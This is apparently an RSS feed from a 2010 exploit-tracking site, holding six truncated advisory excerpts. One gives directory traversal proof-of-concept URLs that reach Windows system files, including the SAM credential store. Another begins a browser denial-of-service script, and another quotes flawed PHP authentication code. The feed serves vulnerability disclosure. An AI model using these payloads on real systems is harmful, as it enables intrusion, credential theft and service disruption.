<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">
<channel>
    <title>ExploitAlert Database - Exploit Database</title>
    <link>http://securityreason.com/exploit_alert</link>
    <description>ExploitAlert Database monitors new exploits and helps you to keep track of the latest exploits, 0days, proof of concepts.</description>
    <language>en-us</language>
    <copyright>Copyright © SecurityReason. All Rights Reserved.</copyright>
    <lastBuildDate>Tue, 09 Feb 2010 22:36:37 +0100</lastBuildDate>
	<image>
      <title>ExploitAlert Database - Exploit Database</title>
      <link>http://securityreason.com/exploit_alert</link>
      <url>http://securityreason.com/gfx/logo.gif</url>
	  <height>70</height>
	  <width>144</width>
	  <description>ExploitAlert Database - SecurityReason.com</description>
    </image>
	<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/exploit_database" /><feedburner:info uri="exploit_database" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><feedburner:emailServiceId>exploit_database</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item>
	<title>Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/27DZW7yigLs/7780</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7780</guid>
	  <pubDate>Tue, 09 Feb 2010 18:48:52 +0100</pubDate>
	  <description>8.1. *Nginx Web Server*&lt;br /&gt;
&lt;br /&gt;
The following configuration snippet for Nginx Web Server will process&lt;br /&gt;
any file with an extension of '.phtml' or '.php' by passing it to&lt;br /&gt;
another service running locally on port 8080 for processing. It will&lt;br /&gt;
deny requests for files beginning with '.ht' and the directory&lt;br /&gt;
'longfoldername'.&lt;br /&gt;
&lt;br /&gt;
/-----&lt;br /&gt;
location ~ \.php$ {&lt;br /&gt;
	proxy_pass   http://127.0.0.1:8080;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
location ~ \.phtml$ {&lt;br /&gt;
	&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/27DZW7yigLs" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7780</feedburner:origLink></item>
		<item>
	<title>Newsletter Tailor Database Backup Dump Vulnerability</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/vcHmB7IQV78/7779</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7779</guid>
	  <pubDate>Tue, 09 Feb 2010 18:42:53 +0100</pubDate>
	  <description>===========================================================================&lt;br /&gt;
===&lt;br /&gt;
        [&amp;amp;#187;] ~ Note : [ Tribute to the martyrs of Gaza . ]&lt;br /&gt;
===========================================================================&lt;br /&gt;
===&lt;br /&gt;
        [&amp;amp;#187;] Newsletter Tailor Database Backup Dump Vulnerability&lt;br /&gt;
===========================================================================&lt;br /&gt;
===&lt;br /&gt;
&lt;br /&gt;
    [&amp;amp;#187;] Script:             [ Newsletter Tailor ]&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/vcHmB7IQV78" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7779</feedburner:origLink></item>
		<item>
	<title>Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/OMhSohJCai4/7778</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7778</guid>
	  <pubDate>Tue, 09 Feb 2010 18:42:11 +0100</pubDate>
	  <description># SecurityReason Note :&lt;br /&gt;
#&lt;br /&gt;
# Vulnerable Code in /admin/auth.inc.php :&lt;br /&gt;
#&lt;br /&gt;
# $admin=$mydb-&amp;gt;query(&amp;quot;select * from `admin`&amp;quot;); &lt;br /&gt;
#$fetch=$mydb-&amp;gt;fetchrows($admin);&lt;br /&gt;
#	$pass=$fetch[&amp;quot;password&amp;quot;];&lt;br /&gt;
#	if ($pass=$password) {&lt;br /&gt;
#		session_destroy();&lt;br /&gt;
#		session_start();&lt;br /&gt;
#		$_SESSION['adminname']=&amp;quot;1&amp;quot;;&lt;br /&gt;
#	define (&amp;quot;_VALID_USER&amp;quot;,&amp;quot;1&amp;quot;);	&lt;br /&gt;
#&lt;br /&gt;
# As we can see we have if ($pass=$passw&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/OMhSohJCai4" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7778</feedburner:origLink></item>
		<item>
	<title>GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/W8HxagfTeBk/7777</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7777</guid>
	  <pubDate>Mon, 08 Feb 2010 20:28:02 +0100</pubDate>
	  <description>By default, the utility runs as an application (and it's very likely that&lt;br /&gt;
people will run this with administrator privileges)&lt;br /&gt;
The discovered vulnerability allows an attacker to access files outside of&lt;br /&gt;
the web application root.&lt;br /&gt;
&lt;br /&gt;
PoC :&lt;br /&gt;
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe&lt;br /&gt;
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam&lt;br /&gt;
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32&lt;br /&gt;
http://192.168.1.200&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/W8HxagfTeBk" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7777</feedburner:origLink></item>
		<item>
	<title>Safari 4.0.4, Firefox 3.5.6, SeaMonkey 2.0.1 Remote Denial of Service (With Possible Memory Corruption With OOM)</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/MBu56K7rCY8/7776</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7776</guid>
	  <pubDate>Mon, 08 Feb 2010 14:05:05 +0100</pubDate>
	  <description>&amp;lt;!--&lt;br /&gt;
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With&lt;br /&gt;
OOM)&lt;br /&gt;
 &lt;br /&gt;
Firefox 3.5.6&lt;br /&gt;
Safari 4.0.4&lt;br /&gt;
SeaMonkey 2.0.1&lt;br /&gt;
 &lt;br /&gt;
Author : 599eme Man&lt;br /&gt;
Contact : flouf@live.fr&lt;br /&gt;
 &lt;br /&gt;
--&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
&amp;lt;body onload=&amp;quot;javascript:DoS();&amp;quot;&amp;gt;&amp;lt;/body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
function DoS() {&lt;br /&gt;
 &lt;br /&gt;
var buffer = 'A';&lt;br /&gt;
for (i =0;i&amp;lt;150;i++) {&lt;br /&gt;
buffer+=buffer+'A'&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/MBu56K7rCY8" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7776</feedburner:origLink></item>
		<item>
	<title>Mongoose Space Character Remote File Disclosure Vulnerability</title>
	
      <link>http://feedproxy.google.com/~r/exploit_database/~3/oPya8H2HrJg/7775</link>
	  <guid isPermaLink="false">http://securityreason.com/exploitalert/7775</guid>
	  <pubDate>Mon, 08 Feb 2010 13:55:12 +0100</pubDate>
	  <description>#################################################################&lt;br /&gt;
# Securitylab.ir&lt;br /&gt;
#################################################################&lt;br /&gt;
# Application Info:&lt;br /&gt;
# Name: Mongoose&lt;br /&gt;
# Version: 2.8&lt;br /&gt;
# Vendor: http://code.google.com/p/mongoose&lt;br /&gt;
#################################################################&lt;br /&gt;
# Vulnerability Info:&lt;br /&gt;
# Type: Remote Source Disclosure&lt;br /&gt;
# Risk: Medium&lt;br /&gt;
##########################################&lt;br&gt;...
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/exploit_database/~4/oPya8H2HrJg" height="1" width="1"/&gt;</description>
    <feedburner:origLink>http://securityreason.com/exploitalert/7775</feedburner:origLink></item>
		</channel>
</rss>
